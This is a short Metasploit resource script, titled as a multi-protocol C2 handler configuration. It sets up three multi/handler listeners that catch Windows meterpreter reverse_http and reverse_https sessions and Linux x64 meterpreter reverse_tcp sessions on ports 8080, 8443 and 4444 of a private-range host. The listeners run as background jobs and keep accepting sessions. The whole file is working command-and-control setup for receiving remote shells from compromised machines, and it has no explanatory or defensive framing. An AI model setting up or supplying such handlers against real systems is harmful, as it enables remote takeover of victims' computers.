# Multi-Protocol C2 Handler Configuration

# 1. HTTP Listener (Windows)
use multi/handler
unset PAYLOAD
unset LPORT
unset LHOST
set PAYLOAD windows/meterpreter/reverse_http
set LPORT 8080
set LHOST 192.168.56.10
set ExitOnSession false
set SessionCommunicationTimeout 10
set SessionExpirationTimeout 3600
exploit -j -z

# 2. HTTPS Listener (Windows Encrypted)
use multi/handler
unset PAYLOAD
unset LPORT
unset LHOST
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 8443
set LHOST 192.168.56.10
set ExitOnSession false
set SessionCommunicationTimeout 10
set SessionExpirationTimeout 3600
exploit -j -z

# 3. TCP Listener (Linux/MX)
use multi/handler
unset PAYLOAD
unset LPORT
unset LHOST
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.56.10
set ExitOnSession false
exploit -j -z
